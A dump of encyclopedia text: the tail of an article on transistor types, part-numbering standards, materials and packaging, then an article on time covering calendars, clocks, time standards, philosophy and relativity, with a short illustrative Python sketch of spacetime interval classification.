The ASEA Brown Boveri (ABB) 5SNA2400E170100, intended for three-phase power supplies, houses three n–p–n IGBTs in a case measuring 38 by 140 by 190 mm and weighing 1.5 kg. Each IGBT is rated at 1,700 volts and can handle 2,400 amperes. Phototransistor. Emitter-switched bipolar transistor (ESBT), a monolithic configuration of a high-voltage bipolar transistor and a low-voltage power MOSFET in cascode topology; it was introduced by STMicroelectronics in the 2000s and abandoned a few years later, around 2012. Multiple-emitter transistor, used in transistor–transistor logic and integrated current mirrors. Multiple-base transistor, used to amplify very-low-level signals in noisy environments such as the pickup of a record player or radio front ends; effectively, it is a very large number of transistors in parallel where, at the output, the signal is added constructively, but random noise is added only stochastically. Tunnel field-effect transistor, which switches by modulating quantum tunneling through a barrier. Diffusion transistor, formed by diffusing dopants into a semiconductor substrate; can be both BJT and FET. Unijunction transistor, which can be used as a simple pulse generator; it comprises a main body of either p-type or n-type semiconductor with ohmic contacts at each end (terminals Base1 and Base2), and a junction with the opposite semiconductor type is formed at a point along the length of the body for the third terminal (Emitter). Single-electron transistors (SETs), consisting of a gate island between two tunneling junctions; the tunneling current is controlled by a voltage applied to the gate through a capacitor. Nanofluidic transistor, which controls the movement of ions through sub-microscopic, water-filled channels. Multigate devices: Tetrode transistor Pentode transistor Trigate transistor (prototype by Intel) Dual-gate field-effect transistors, which have a single channel with two gates in cascode, a configuration optimized for high-frequency amplifiers, mixers, and oscillators. Junctionless nanowire transistor (JNT), which uses a simple nanowire of silicon surrounded by an electrically isolated "wedding ring" that acts to gate the flow of electrons through the wire. Nanoscale vacuum-channel transistor: in 2012, NASA and the National Nanofab Center in South Korea were reported to have built a prototype vacuum-channel transistor only 150 nanometers in size; it can be manufactured cheaply using standard silicon semiconductor processing, can operate at high speeds even in hostile environments, and could consume just as much power as a standard transistor. Organic electrochemical transistor. Solaristor (from solar cell transistor), a two-terminal gate-less self-powered phototransistor. Germanium–tin transistor Wood transistor Paper transistor Carbon-doped silicon–germanium (Si–Ge:C) transistor Diamond transistor Aluminum nitride transistor Super-lattice castellated field-effect transistors Device identification Three major identification standards are used for designating transistor devices. In each, the alphanumeric prefix provides clues to the type of the device. Joint Electron Device Engineering Council (JEDEC) The JEDEC part numbering scheme evolved in the 1960s in the United States. The JEDEC EIA-370 transistor device numbers usually start with 2N, indicating a three-terminal device. Dual-gate field-effect transistors are four-terminal devices, and begin with 3N.
The prefix is followed by a two-, three- or four-digit number with no significance as to device properties, although early devices with low numbers tend to be germanium devices. For example, the 2N3055 is a silicon n–p–n power transistor and the 2N1301 is a p–n–p germanium switching transistor. A letter suffix, such as "A", is sometimes used to indicate a newer variant, but rarely gain groupings. Japanese Industrial Standard (JIS) In Japan, the JIS semiconductor designation (JIS-C-7012) labels transistor devices starting with 2S, e.g., 2SD965, but sometimes the "2S" prefix is not marked on the package; a 2SD965 might only be marked D965, and a 2SC1815 might be listed by a supplier as simply C1815. This series sometimes has suffixes, such as R, O, BL (standing for red, orange, blue, etc.), to denote variants, such as tighter hFE (gain) groupings. European Electronic Component Manufacturers Association (EECA) The European Electronic Component Manufacturers Association (EECA) uses a numbering scheme that was inherited from Pro Electron when it merged with EECA in 1983. This scheme begins with two letters: the first gives the semiconductor type (A for germanium, B for silicon, and C for materials like GaAs); the second letter denotes the intended use (A for diode, C for general-purpose transistor, etc.). A three-digit sequence number (or one letter and two digits, for industrial types) follows. With early devices this indicated the case type. Suffixes may be used: a letter (e.g. "C" often means high hFE, as in the BC549C) or other codes may follow to show gain (e.g. BC327-25) or voltage rating (e.g. BUK854-800A). Proprietary Manufacturers of devices may have their own proprietary numbering systems, for example CK722. Since devices are second-sourced, a manufacturer's prefix (like "MPF" in MPF102, which originally would denote a Motorola FET) is now an unreliable indicator of who made the device. Some proprietary naming schemes adopt parts of other naming schemes; for example, a PN2222A is a (possibly Fairchild Semiconductor) 2N2222A in a plastic case (but a PN108 is a plastic version of a BC108, not a 2N108, while the PN100 is unrelated to other xx100 devices). Military part numbers are sometimes assigned their own codes, such as the British Military CV Naming System. Manufacturers buying large numbers of similar parts may have them supplied with "house numbers", identifying a particular purchasing specification and not necessarily a device with a standardized registered number. For example, an HP part 1854,0053 is a (JEDEC) 2N2218 transistor which is also assigned the CV number CV7763. Naming problems With so many independent naming schemes, and the abbreviation of part numbers when printed on the devices, ambiguity sometimes occurs. For example, two different devices may be marked "J176" (one the J176 low-power JFET, the other the higher-powered MOSFET 2SJ176). As older "through-hole" transistors are given surface-mount packaged counterparts, they tend to be assigned many different part numbers because manufacturers have their own systems for coping with the variety in pinout arrangements and options for dual or matched n–p–n + p–n–p devices in one package. So even when the original device (such as a 2N3904) may have been assigned by a standards authority, and is well known by engineers over the years, the new versions are far from standardized in their naming. Construction Semiconductor material The first BJTs were made from germanium (Ge).
Silicon (Si) types currently predominate but certain advanced microwave and high-performance versions now employ the compound semiconductor material gallium arsenide (GaAs) and the semiconductor alloy silicon–germanium (SiGe). Single-element semiconductor material (Ge and Si) is described as elemental. Rough parameters for the most common semiconductor materials used to make transistors are given in the adjacent table. These parameters will vary with an increase in temperature, electric field, impurity level, strain, and sundry other factors. The junction forward voltage is the voltage applied to the emitter-base junction of a BJT to make the base conduct a specified current. The current increases exponentially as the junction forward voltage is increased. The values given in the table are typical for a current of 1 mA (the same values apply to semiconductor diodes). The lower the junction forward voltage the better, as this means that less power is required to "drive" the transistor. The junction forward voltage for a given current decreases with an increase in temperature. For a typical silicon junction, the change is −2.1 mV/°C. In some circuits special compensating elements (sensistors) must be used to compensate for such changes. The density of mobile carriers in the channel of a MOSFET is a function of the electric field forming the channel and of various other phenomena such as the impurity level in the channel. Some impurities, called dopants, are introduced deliberately in making a MOSFET, to control the MOSFET electrical behavior. The electron mobility and hole mobility columns show the average speed that electrons and holes diffuse through the semiconductor material with an electric field of 1 volt per meter applied across the material. In general, the higher the electron mobility the faster the transistor can operate. The table indicates that Ge is a better material than Si in this respect. However, Ge has four major shortcomings compared to silicon and gallium arsenide: Its maximum temperature is limited. It has relatively high leakage current. It cannot withstand high voltages. It is less suitable for fabricating integrated circuits. Because the electron mobility is higher than the hole mobility for all semiconductor materials, a given bipolar n–p–n transistor tends to be swifter than an equivalent p–n–p transistor. GaAs has the highest electron mobility of the three semiconductors. It is for this reason that GaAs is used in high-frequency applications. A relatively recent FET development, the high-electron-mobility transistor (HEMT), has a heterostructure (junction between different semiconductor materials) of aluminium gallium arsenide (AlGaAs)-gallium arsenide (GaAs) which has twice the electron mobility of a GaAs-metal barrier junction. Because of their high speed and low noise, HEMTs are used in satellite receivers working at frequencies around 12 GHz. HEMTs based on gallium nitride and aluminum gallium nitride (AlGaN/GaN HEMTs) provide still higher electron mobility and are being developed for various applications. Maximum junction temperature values represent a cross-section taken from various manufacturers' datasheets. This temperature should not be exceeded or the transistor may be damaged. Al–Si junction refers to the high-speed (aluminum-silicon) metal–semiconductor barrier diode, commonly known as a Schottky diode. 
This is included in the table because some silicon power IGFETs have a parasitic reverse Schottky diode formed between the source and drain as part of the fabrication process. This diode can be a nuisance, but sometimes it is used in the circuit. Packaging Discrete transistors can be individually packaged transistors or unpackaged transistor chips. Transistors come in many different semiconductor packages (see image). The two main categories are through-hole (or leaded) and surface-mount, also known as surface-mount device (SMD). The ball grid array (BGA) is the latest surface-mount package. It has solder "balls" on the underside in place of leads. Because they are smaller and have shorter interconnections, SMDs have better high-frequency characteristics but lower power ratings. Transistor packages are made of glass, metal, ceramic, or plastic. The package often dictates the power rating and frequency characteristics. Power transistors have larger packages that can be clamped to heat sinks for enhanced cooling. Additionally, most power transistors have the collector or drain physically connected to the metal enclosure. At the other extreme, some surface-mount microwave transistors are as small as grains of sand. Often a given transistor type is available in several packages. Transistor packages are mainly standardized, but the assignment of a transistor's functions to the terminals is not: other transistor types can assign other functions to the package's terminals. Even for the same transistor type the terminal assignment can vary (normally indicated by a suffix letter to the part number, e.g. BC212L and BC212K). Nowadays most transistors come in a wide range of SMT packages. In comparison, the list of available through-hole packages is relatively small. Here is a short list of the most common through-hole transistor packages in alphabetical order: ATV, E-line, MRT, HRT, SC-43, SC-72, TO-3, TO-18, TO-39, TO-92, TO-126, TO-220, TO-247, TO-251, TO-262, ZTX851. Unpackaged transistor chips (die) may be assembled into hybrid devices. The IBM SLT module of the 1960s is one example of such a hybrid circuit module using glass-passivated transistor (and diode) die. Other packaging techniques for discrete transistors as chips include direct chip attach (DCA) and chip-on-board (COB). Flexible transistors Researchers have made several kinds of flexible transistors, including organic field-effect transistors. Flexible transistors are useful in some kinds of flexible displays and other flexible electronics.
Technology
Components
null
30012
https://en.wikipedia.org/wiki/Time
Time
Time is the continuous progression of existence that occurs in an apparently irreversible succession from the past, through the present, and into the future. It is a component quantity of various measurements used to sequence events, to compare the duration of events (or the intervals between them), and to quantify rates of change of quantities in material reality or in the conscious experience. Time is often referred to as a fourth dimension, along with three spatial dimensions. Scientists have theorized a beginning of time in the universe (the Big Bang) and an end (e.g., heat death or the Big Crunch). A cyclic model describes a cyclical nature, whereas the philosophy of eternalism views the subject from a different angle. Time is one of the seven fundamental physical quantities in both the International System of Units (SI) and International System of Quantities. The SI base unit of time is the second, which is defined by measuring the electronic transition frequency of caesium atoms. General relativity is the primary framework for understanding how spacetime works. Through advances in both theoretical and experimental investigations of spacetime, it has been shown that time can be distorted and dilated, particularly at the edges of black holes. Throughout history, time has been an important subject of study in religion, philosophy, and science. Temporal measurement has occupied scientists and technologists and has been a prime motivation in navigation and astronomy. Time is also of significant social importance, having economic value ("time is money") as well as personal value, due to an awareness of the limited time in each day and in human life spans. Cultural attitudes towards the human use of time are apparent in the verbs used—from "kill" to "waste" to "pass"—and sayings (like carpe diem). Definition The concept of time can be complex. Multiple notions exist and defining time in a manner applicable to all fields without circularity has consistently eluded scholars. Nevertheless, diverse fields such as business, industry, sports, the sciences, and the performing arts all incorporate some notion of time into their respective measuring systems. Traditional definitions of time involved the observation of periodic motion such as the apparent motion of the sun across the sky, the phases of the moon, and the passage of a free-swinging pendulum. More modern systems include the Global Positioning System, other satellite systems, Coordinated Universal Time and mean solar time. Although these systems differ from one another, with careful measurements they can be synchronized. In physics, time is a fundamental concept to define other quantities, such as velocity. To avoid a circular definition, time in physics is operationally defined as "what a clock reads", specifically a count of repeating events such as the SI second. Although this aids in practical measurements, it does not address the essence of time. Physicists developed the concept of the spacetime continuum, where events are assigned four coordinates: three for space and one for time. Events like particle collisions, supernovas, or rocket launches have coordinates that may vary for different observers, making concepts like "now" and "here" relative. In general relativity, these coordinates do not directly correspond to the causal structure of events. 
Instead, the spacetime interval is calculated and classified as either space-like or time-like, depending on whether an observer exists that would say the events are separated by space or by time. Since the time required for light to travel a specific distance is the same for all observers—a fact first publicly demonstrated by the Michelson–Morley experiment—all observers will consistently agree on this definition of time as a causal relation. General relativity does not address the nature of time for extremely small intervals where quantum mechanics holds. In quantum mechanics, time is treated as a universal and absolute parameter, differing from general relativity's notion of independent clocks. The problem of time consists of reconciling these two theories. As of 2024, there is no generally accepted theory of quantum general relativity. Measurement Generally speaking, historical methods of temporal measurement, or chronometry, have taken two distinct forms: the calendar, a mathematical tool for organising long intervals of time, and the clock (e.g., watch), a physical mechanism that counts the passage of time. In day-to-day life, a clock was consulted for periods less than a day, whereas a calendar was consulted for periods longer than a day. Increasingly, personal electronic devices display both calendars and clocks simultaneously. The number (as on a clock dial or calendar) that marks the occurrence of a specified event (as to hour or date) is obtained by counting from a certain starting date (epoch), and is relative to a certain time zone (including daylight saving time). Precise measurements, as in astronomy, use a fiducial epoch – a central reference point. History of the calendar Artifacts from the Paleolithic suggest that the moon was used to reckon time as early as 6,000 years ago. Lunar calendars were among the first to appear, with years of either 12 or 13 lunar months (either 354 or 384 days). Without intercalation to add days or months to some years, seasons quickly drift in a calendar based solely on twelve lunar months. Lunisolar calendars have a thirteenth month added to some years to make up for the difference between a full year (now known to be about 365.24 days) and a year of just twelve lunar months. The numbers twelve and thirteen came to feature prominently in many cultures, at least partly due to this relationship of months to years. Other early forms of calendars originated in Mesoamerica, particularly in ancient Mayan civilization. These calendars were religiously and astronomically based, with 18 months in a year and 20 days in a month, plus five epagomenal days at the end of the year. The reforms of Julius Caesar in 45 BC put the Roman world on a solar calendar. This Julian calendar was faulty in that its intercalation still allowed the astronomical solstices and equinoxes to advance against it by about 11 minutes per year. Pope Gregory XIII introduced a correction in 1582; the Gregorian calendar was only slowly adopted by different nations over a period of centuries, but it is now by far the most commonly used calendar around the world. During the French Revolution, a new clock and calendar were invented as part of the dechristianization of France and to create a more rational system to replace the Gregorian calendar. The French Republican Calendar's days consisted of ten hours of a hundred minutes of a hundred seconds, which marked a deviation from the base-12 (duodecimal) system used in many other devices by many cultures.
The system was abolished in 1806. History of other devices A large variety of devices have been invented to measure time. The study of these devices is called horology. An ancient Egyptian device, similar in shape to a bent T-square, measured the passage of time from the shadow cast by its crossbar on a nonlinear rule. The T was oriented eastward in the mornings. At noon, the device was turned around so that it could cast its shadow in the evening direction. A sundial uses a gnomon to cast a shadow on a set of markings calibrated to the hour. The position of the shadow marks the hour in local time. The idea of separating the day into smaller parts is credited to the Egyptians because of their sundials, which operated on a duodecimal system. The importance of the number 12 is due to the number of lunar cycles in a year and the number of stars used to count the passage of night. The most precise timekeeping device of the ancient world was the water clock, or clepsydra, one of which was found in the tomb of Egyptian pharaoh Amenhotep I. Water clocks could be used to measure the hours even at night but required manual upkeep to replenish the flow of water. The ancient Greeks and the people from Chaldea (southeastern Mesopotamia) regularly maintained timekeeping records as an essential part of their astronomical observations. Arab inventors and engineers, in particular, made improvements on the use of water clocks up to the Middle Ages. In the 11th century, Chinese inventors and engineers invented the first mechanical clocks driven by an escapement mechanism. The hourglass uses the flow of sand to measure the flow of time; hourglasses were used in navigation. Ferdinand Magellan used 18 glasses on each ship for his circumnavigation of the globe (1522). Incense sticks and candles were, and are, commonly used to measure time in temples and churches across the globe. Water clocks, and, later, mechanical clocks, were used to mark the events of the abbeys and monasteries of the Middle Ages. Richard of Wallingford (1292–1336), abbot of St. Alban's abbey, famously built a mechanical clock as an astronomical orrery about 1330. Great advances in accurate time-keeping were made by Galileo Galilei and especially Christiaan Huygens with the invention of pendulum-driven clocks, along with the invention of the minute hand by Jost Burgi. The English word clock probably comes from the Middle Dutch word klocke which, in turn, derives from the medieval Latin word clocca, which ultimately derives from Celtic and is cognate with French, Latin, and German words that mean bell. The passage of the hours at sea was marked by bells and denoted the time (see ship's bell). The hours were marked by bells in abbeys as well as at sea. Clocks can range from watches to more exotic varieties such as the Clock of the Long Now. They can be driven by a variety of means, including gravity, springs, and various forms of electrical power, and regulated by a variety of means such as a pendulum. Alarm clocks first appeared in ancient Greece around 250 BC with a water clock that would set off a whistle. This idea was later mechanized by Levi Hutchins and Seth E. Thomas. A chronometer is a portable timekeeper that meets certain precision standards. Initially, the term was used to refer to the marine chronometer, a timepiece used to determine longitude by means of celestial navigation, a precision first achieved by John Harrison.
More recently, the term has also been applied to the chronometer watch, a watch that meets precision standards set by the Swiss agency COSC. The most accurate timekeeping devices are atomic clocks, which are accurate to within seconds over many millions of years, and are used to calibrate other clocks and timekeeping instruments. Atomic clocks use the frequency of electronic transitions in certain atoms to measure the second. One of the atoms used is caesium; most modern atomic clocks probe caesium with microwaves to determine the frequency of these electron vibrations. Since 1967, the International System of Units has based its unit of time, the second, on the properties of caesium atoms. SI defines the second as 9,192,631,770 cycles of the radiation that corresponds to the transition between two electron spin energy levels of the ground state of the 133Cs atom. Today, the Global Positioning System in coordination with the Network Time Protocol can be used to synchronize timekeeping systems across the globe. In medieval philosophical writings, the atom was a unit of time referred to as the smallest possible division of time. The earliest known occurrence in English is in Byrhtferth's Enchiridion (a science text) of 1010–1012, where it was defined as 1/564 of a momentum (1½ minutes), and thus equal to 15/94 of a second. It was used in the computus, the process of calculating the date of Easter. The smallest time interval uncertainty in direct measurements is on the order of 12 attoseconds (1.2 × 10−17 seconds), about 3.7 × 1026 Planck times. Units The second (s) is the SI base unit. A minute (min) is 60 seconds in length (or, rarely, 59 or 61 seconds when leap seconds are employed), and an hour is 60 minutes or 3,600 seconds in length. A day is usually 24 hours or 86,400 seconds in length; however, the duration of a calendar day can vary due to daylight saving time and leap seconds. Time standards A time standard is a specification for measuring time: assigning a number or calendar date to an instant (point in time), quantifying the duration of a time interval, and establishing a chronology (ordering of events). In modern times, several time specifications have been officially recognized as standards, where formerly they were matters of custom and practice. The invention in 1955 of the caesium atomic clock has led to the replacement of older and purely astronomical time standards such as sidereal time and ephemeris time, for most practical purposes, by newer time standards based wholly or partly on atomic time using the SI second. International Atomic Time (TAI) is the primary international time standard from which other time standards are calculated. Universal Time (UT1) is mean solar time at 0° longitude, computed from astronomical observations. It varies from TAI because of the irregularities in Earth's rotation. Coordinated Universal Time (UTC) is an atomic time scale designed to approximate Universal Time. UTC differs from TAI by an integral number of seconds. UTC is kept within 0.9 second of UT1 by the introduction of one-second steps to UTC, the leap second. The Global Positioning System broadcasts a very precise time signal based on UTC time. The surface of the Earth is split into a number of time zones. Standard time or civil time in a time zone deviates a fixed, round amount, usually a whole number of hours, from some form of Universal Time, usually UTC. Most time zones are exactly one hour apart, and by convention compute their local time as an offset from UTC.
For example, time zones at sea are based on UTC. In many locations (but not at sea) these offsets vary twice yearly due to daylight saving time transitions. Some other time standards are used mainly for scientific work. Terrestrial Time is a theoretical ideal scale realized by TAI. Geocentric Coordinate Time and Barycentric Coordinate Time are scales defined as coordinate times in the context of the general theory of relativity. Barycentric Dynamical Time is an older relativistic scale that is still in use. Philosophy Religion Religions which view time as cyclical Many ancient cultures, particularly in the East, had a cyclical view of time. In these traditions, time was often seen as a recurring pattern of ages or cycles, where events and phenomena repeated themselves in a predictable manner. One of the most famous examples of this concept is found in Hindu philosophy, where time is depicted as a wheel called the "Kalachakra" or "Wheel of Time." According to this belief, the universe undergoes endless cycles of creation, preservation, and destruction. Similarly, in other ancient cultures such as those of the Mayans, Aztecs, and Chinese, there were also beliefs in cyclical time, often associated with astronomical observations and calendars. These cultures developed complex systems to track time, seasons, and celestial movements, reflecting their understanding of cyclical patterns in nature and the universe. The cyclical view of time contrasts with the linear concept of time more common in Western thought, where time is seen as progressing in a straight line from past to future without repetition. Time in Abrahamic religions In general, the Islamic and Judeo-Christian world-view regards time as linear and directional, beginning with the act of creation by God. The traditional Christian view sees time ending, teleologically, with the eschatological end of the present order of things, the "end time". In the Old Testament book Ecclesiastes, traditionally ascribed to Solomon (970–928 BC), time (as the Hebrew words עידן iddan (age, as in "Ice age") and זמן zĕman (time) are often translated) is a medium for the passage of predestined events. (Another word, زمان / זמן zamān, meant time fit for an event, and is used as the modern Arabic, Persian, and Hebrew equivalent of the English word "time".) Time in Greek mythology The Greek language denotes two distinct principles, Chronos and Kairos. The former refers to numeric, or chronological, time. The latter, literally "the right or opportune moment", relates specifically to metaphysical or Divine time. In theology, Kairos is qualitative, as opposed to quantitative. In Greek mythology, Chronos (ancient Greek: Χρόνος) is identified as the Personification of Time. His name in Greek means "time" and is alternatively spelled Chronus (Latin spelling) or Khronos. Chronos is usually portrayed as an old, wise man with a long, gray beard, such as "Father Time". Some English words whose etymological root is khronos/chronos include chronology, chronometer, chronic, anachronism, synchronise, and chronicle. Time in Kabbalah & Rabbinical thought Rabbis sometimes saw time like "an accordion that was expanded and collapsed at will." According to Kabbalists, "time" is a paradox and an illusion. Time in Advaita Vedanta According to Advaita Vedanta, time is integral to the phenomenal world, which lacks independent reality. Time and the phenomenal world are products of maya, influenced by our senses, concepts, and imaginations.
The phenomenal world, including time, is seen as impermanent and characterized by plurality, suffering, conflict, and division. Since phenomenal existence is dominated by temporality (kala), everything within time is subject to change and decay. Overcoming pain and death requires knowledge that transcends temporal existence and reveals its eternal foundation. In Western philosophy Two contrasting viewpoints on time divide prominent philosophers. One view is that time is part of the fundamental structure of the universe – a dimension independent of events, in which events occur in sequence. Isaac Newton subscribed to this realist view, and hence it is sometimes referred to as Newtonian time. The opposing view is that time does not refer to any kind of "container" that events and objects "move through", nor to any entity that "flows", but that it is instead part of a fundamental intellectual structure (together with space and number) within which humans sequence and compare events. This second view, in the tradition of Gottfried Leibniz and Immanuel Kant, holds that time is neither an event nor a thing, and thus is not itself measurable nor can it be travelled. Furthermore, it may be that there is a subjective component to time, but whether or not time itself is "felt", as a sensation, or is a judgment, is a matter of debate. In philosophy, the nature of time has been questioned throughout the centuries: what time is, and whether it is real or not. Ancient Greek philosophers asked if time was linear or cyclical and if time was endless or finite. These philosophers had different ways of explaining time; for instance, ancient Indian philosophers had something called the Wheel of Time, the belief that there were repeating ages over the lifespan of the universe. This led to beliefs like cycles of rebirth and reincarnation. The Greek philosophers believed that the universe was infinite, and was an illusion to humans. Plato believed that time was made by the Creator at the same instant as the heavens. He also said that time is a period of motion of the heavenly bodies. Aristotle believed that time correlated to movement, that time did not exist on its own but was relative to the motion of objects. He also believed that time was related to the motion of celestial bodies; the reason that humans can tell time is because of orbital periods, and therefore there is a duration to time. The Vedas, the earliest texts on Indian philosophy and Hindu philosophy dating to the late 2nd millennium BC, describe ancient Hindu cosmology, in which the universe goes through repeated cycles of creation, destruction and rebirth, with each cycle lasting 4,320 million years. Ancient Greek philosophers, including Parmenides and Heraclitus, wrote essays on the nature of time. Plato, in the Timaeus, identified time with the period of motion of the heavenly bodies. Aristotle, in Book IV of his Physica, defined time as 'number of movement in respect of the before and after'. In Book 11 of his Confessions, St. Augustine of Hippo ruminates on the nature of time, asking, "What then is time? If no one asks me, I know: if I wish to explain it to one that asketh, I know not." He begins to define time by what it is not rather than what it is, an approach similar to that taken in other negative definitions. However, Augustine ends up calling time a "distention" of the mind (Confessions 11.26) by which we simultaneously grasp the past in memory, the present by attention, and the future by expectation.
Isaac Newton believed in absolute space and absolute time; Leibniz believed that time and space are relational. The differences between Leibniz's and Newton's interpretations came to a head in the famous Leibniz–Clarke correspondence. Philosophers in the 17th and 18th centuries questioned whether time was real and absolute, or an intellectual concept that humans use to understand and sequence events. These questions led to realism versus anti-realism: the realists believed that time is a fundamental part of the universe, and is perceived through events happening in sequence, in a dimension. Isaac Newton said that we are merely occupying time; he also said that humans can only understand relative time. Relative time is a measurement of objects in motion. The anti-realists believed that time is merely a convenient intellectual concept for humans to understand events. This means that time would be useless unless there were objects that it could interact with; this was called relational time. René Descartes, John Locke, and David Hume said that one's mind needs to acknowledge time in order to understand what time is. Immanuel Kant believed that we cannot know what something is unless we experience it first hand. Immanuel Kant, in the Critique of Pure Reason, described time as an a priori intuition that allows us (together with the other a priori intuition, space) to comprehend sense experience. With Kant, neither space nor time is conceived as a substance; rather, both are elements of a systematic mental framework that necessarily structures the experiences of any rational agent, or observing subject. Kant thought of time as a fundamental part of an abstract conceptual framework, together with space and number, within which we sequence events, quantify their duration, and compare the motions of objects. In this view, time does not refer to any kind of entity that "flows," that objects "move through," or that is a "container" for events. Spatial measurements are used to quantify the extent of and distances between objects, and temporal measurements are used to quantify the durations of and between events. Time was designated by Kant as the purest possible schema of a pure concept or category. Henri Bergson believed that time was neither a real homogeneous medium nor a mental construct, but possesses what he referred to as Duration. Duration, in Bergson's view, was creativity and memory as an essential component of reality. According to Martin Heidegger, we do not exist inside time; we are time. Hence, the relationship to the past is a present awareness of having been, which allows the past to exist in the present. The relationship to the future is the state of anticipating a potential possibility, task, or engagement. It is related to the human propensity for caring and being concerned, which causes "being ahead of oneself" when thinking of a pending occurrence. Therefore, this concern for a potential occurrence also allows the future to exist in the present. The present becomes an experience, which is qualitative instead of quantitative. Heidegger seems to think this is the way that a linear relationship with time, or temporal existence, is broken or transcended. We are not stuck in sequential time. We are able to remember the past and project into the future – we have a kind of random access to our representation of temporal existence; we can, in our thoughts, step out of (ecstasis) sequential time.
Modern era philosophers asked: is time real or unreal, is time happening all at once or a duration, is time tensed or tenseless, and is there a future to be? There is a theory called the tenseless or B-theory; this theory says that any tensed terminology can be replaced with tenseless terminology. For example, "we will win the game" can be replaced with "we do win the game", taking out the future tense. On the other hand, there is a theory called the tense or A-theory; this theory says that our language has tense verbs for a reason and that the future cannot be determined. There is also something called imaginary time, a concept from Stephen Hawking, who said that space and imaginary time are finite but have no boundaries. Imaginary time is not real or unreal; it is something that is hard to visualize. Philosophers can agree that physical time exists outside of the human mind and is objective, and psychological time is mind-dependent and subjective. Unreality In 5th century BC Greece, Antiphon the Sophist, in a fragment preserved from his chief work On Truth, held that: "Time is not a reality (hypostasis), but a concept (noêma) or a measure (metron)." Parmenides went further, maintaining that time, motion, and change were illusions, leading to the paradoxes of his follower Zeno. Time as an illusion is also a common theme in Buddhist thought. J. M. E. McTaggart's 1908 The Unreality of Time argues that, since every event has the characteristic of being both present and not present (i.e., future or past), time is a self-contradictory idea (see also The flow of time). These arguments often center on what it means for something to be unreal. Modern physicists generally believe that time is as real as space – though others, such as Julian Barbour, argue that the quantum equations of the universe take their true form when expressed in the timeless realm containing every possible now or momentary configuration of the universe. A modern philosophical theory called presentism views the past and the future as human-mind interpretations of movement instead of real parts of time (or "dimensions") which coexist with the present. This theory rejects the existence of all direct interaction with the past or the future, holding only the present as tangible. This is one of the philosophical arguments against time travel. This contrasts with eternalism (all time: present, past and future, is real) and the growing block theory (the present and the past are real, but the future is not). Physical definition Until Einstein's reinterpretation of the physical concepts associated with time and space in 1907, time was considered to be the same everywhere in the universe, with all observers measuring the same time interval for any event. Non-relativistic classical mechanics is based on this Newtonian idea of time. Einstein, in his special theory of relativity, postulated the constancy and finiteness of the speed of light for all observers. He showed that this postulate, together with a reasonable definition for what it means for two events to be simultaneous, requires that distances appear compressed and time intervals appear lengthened for events associated with objects in motion relative to an inertial observer. The theory of special relativity finds a convenient formulation in Minkowski spacetime, a mathematical structure that combines three dimensions of space with a single dimension of time.
In this formalism, distances in space can be measured by how long light takes to travel that distance, e.g., a light-year is a measure of distance, and a meter is now defined in terms of how far light travels in a certain amount of time. Two events in Minkowski spacetime are separated by an invariant interval, which can be either space-like, light-like, or time-like. Events that have a time-like separation cannot be simultaneous in any frame of reference; there must be a temporal component (and possibly a spatial one) to their separation. Events that have a space-like separation will be simultaneous in some frame of reference, and there is no frame of reference in which they do not have a spatial separation. Different observers may calculate different distances and different time intervals between two events, but the invariant interval between the events is independent of the observer (and his or her velocity). Arrow of time Unlike space, where an object can travel in opposite directions (and in three dimensions), time appears to have only one dimension and only one direction – the past lies behind, fixed and immutable, while the future lies ahead and is not necessarily fixed. Yet most laws of physics allow any process to proceed both forward and in reverse; only a few physical phenomena violate the reversibility of time. This directionality is known as the arrow of time. Acknowledged examples of the arrow of time are: the radiative arrow of time, manifested in waves (e.g., light and sound) that only expand (rather than focus) as time advances (see light cone); the entropic arrow of time: according to the second law of thermodynamics, an isolated system evolves toward greater disorder rather than spontaneously becoming more ordered; the quantum arrow of time, which is related to the irreversibility of measurement in quantum mechanics according to the Copenhagen interpretation; the weak arrow of time: the preference for a certain time direction of the weak interaction in particle physics (see violation of CP symmetry); and the cosmological arrow of time, which follows the accelerating expansion of the Universe after the Big Bang. The relationship between these different arrows of time is a hotly debated topic in theoretical physics. Classical mechanics In non-relativistic classical mechanics, Newton's concept of "relative, apparent, and common time" can be used in the formulation of a prescription for the synchronization of clocks. Events seen by two different observers in motion relative to each other produce a mathematical concept of time that works sufficiently well for describing the everyday phenomena of most people's experience. In the late nineteenth century, physicists encountered problems with the classical understanding of time in connection with the behavior of electricity and magnetism. Einstein resolved these problems by invoking a method of synchronizing clocks using the constant, finite speed of light as the maximum signal velocity. This led directly to the conclusion that observers in motion relative to one another measure different elapsed times between the same events. Spacetime Time has historically been closely related with space, the two together merging into spacetime in Einstein's special relativity and general relativity. According to these theories, the concept of time depends on the spatial reference frame of the observer, and the human perception, as well as the measurement by instruments such as clocks, are different for observers in relative motion. 
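To make the interval classification above concrete, here is a minimal Python sketch, written with units in which c = 1 and a (+, −, −, −) sign convention; the function names and the tolerance are illustrative choices of this sketch, not standard library calls.

```python
import math

# Sketch: classifying the separation of two events in Minkowski spacetime.
# Units with c = 1; events given as (t, x, y, z); signature (+, -, -, -).

def interval_squared(event_a, event_b):
    """Invariant interval s^2 = dt^2 - dx^2 - dy^2 - dz^2 between two events."""
    dt, dx, dy, dz = (b - a for a, b in zip(event_a, event_b))
    return dt**2 - dx**2 - dy**2 - dz**2

def classify(event_a, event_b, tol=1e-12):
    """Time-like pairs are never simultaneous; space-like pairs can be."""
    s2 = interval_squared(event_a, event_b)
    if s2 > tol:
        return "time-like"    # some frame sees the events at the same place
    if s2 < -tol:
        return "space-like"   # some frame sees the events as simultaneous
    return "light-like"       # connected only by a light signal

def lorentz_gamma(v):
    """Time-dilation factor for relative speed v (as a fraction of c)."""
    return 1.0 / math.sqrt(1.0 - v * v)

origin = (0.0, 0.0, 0.0, 0.0)
print(classify(origin, (2.0, 1.0, 0.0, 0.0)))   # time-like
print(classify(origin, (1.0, 2.0, 0.0, 0.0)))   # space-like
print(classify(origin, (1.0, 1.0, 0.0, 0.0)))   # light-like
print(lorentz_gamma(0.99))  # ~7.1: one second aboard corresponds to ~7.1 outside
```

Because s² is the same for every inertial observer, the classification is frame-independent even though the individual time and space differences are not; the gamma factor quantifies the time dilation discussed next.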
